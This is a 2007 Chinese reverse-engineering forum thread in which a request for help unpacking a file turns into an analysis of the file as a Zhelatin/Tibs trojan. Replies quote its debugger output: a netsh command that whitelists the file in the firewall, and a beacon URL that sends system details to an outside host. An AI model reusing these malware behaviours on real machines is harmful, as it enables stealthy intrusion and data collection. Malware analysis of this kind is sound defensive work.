首页
社区
课程
招聘
[求助]一个未知壳,peid不认识,但脱后无法运行,帮忙看看
发表于: 2007-10-5 22:09 5444

[求助]一个未知壳,peid不认识,但脱后无法运行,帮忙看看

2007-10-5 22:09
5444
收藏
免费 0
支持
分享
最新回复 (6)
雪    币: 589
活跃值: (119)
能力值: ( LV11,RANK:190 )
在线值:
发帖
回帖
粉丝
2
没人吗
自顶一下
2007-10-6 12:32
0
雪    币: 200
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
我下载来试试看
2007-10-6 12:43
0
雪    币: 211
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
查到的是这个:MPEG Layer II/III music file *
2007-10-7 22:26
0
雪    币: 154
活跃值: (75)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
5
好像是个病毒 任务管理器打不开 卡巴运行不了
防火墙放行
00402337    E8 1C300000     CALL win32.00405358              ; JMP 到 kernel32.WinExec
0013EB80   0013F528  |CmdLine = "netsh firewall set allowedprogram 

'C:\Documents and Settings\Administrator\桌面\win32.exe' enable"

收集信息
0013EB34   00407140      ASCII "http://mediacount.net/adv/064/adload.php?a1=People's Republic of China&a2=Type of Processor: PENTIUM PRO or PENTIUM II/III&a3=Windows version is 5.1&a4=Build: 2600, Platform ID: 2&a5=outpost.exe&table=adv64"
0013EB38   004084AA      ASCII "%s%s%s0%u%s?a1=%s&a2=%s&a3=%s&a4=%s&a5=%s&table=adv%u"
0013EB3C   0013FE50      ASCII "http://"
0013EB40   0013FD50      ASCII "mediacount.net"

还有复制文件到系统目录、自启动等等
不知道楼主居心何在?
2007-10-7 22:59
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
呵呵,在这放马呀???
2007-10-8 10:29
0
雪    币: 203
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
Scan taken on 08 Oct 2007 02:53:10 (GMT)  
A-Squared  Found nothing
AntiVir  Found WORM/Zhelatin.Gen  
ArcaVir  Found Trojan.W32.Lager.Dr81  
Avast  Found Win32:Tibser  
AVG Antivirus  Found Downloader.Tibs  
BitDefender  Found Trojan.Peed.ILS  
ClamAV  Found nothing
CPsecure  Found nothing
Dr.Web  Found nothing
F-Prot Antivirus  Found nothing
F-Secure Anti-Virus  Found nothing
Fortinet  Found nothing
Kaspersky Anti-Virus  Found Email-Worm.Win32.Zhelatin.kf  
NOD32  Found nothing
Norman Virus Control  Found Tibs.gen168  
Panda Antivirus  Found nothing
Rising Antivirus  Found nothing
Sophos Antivirus  Found nothing
VirusBuster  Found nothing
VBA32  Found nothing
2007-10-8 10:54
0
游客
登录 | 注册 方可回帖
返回
//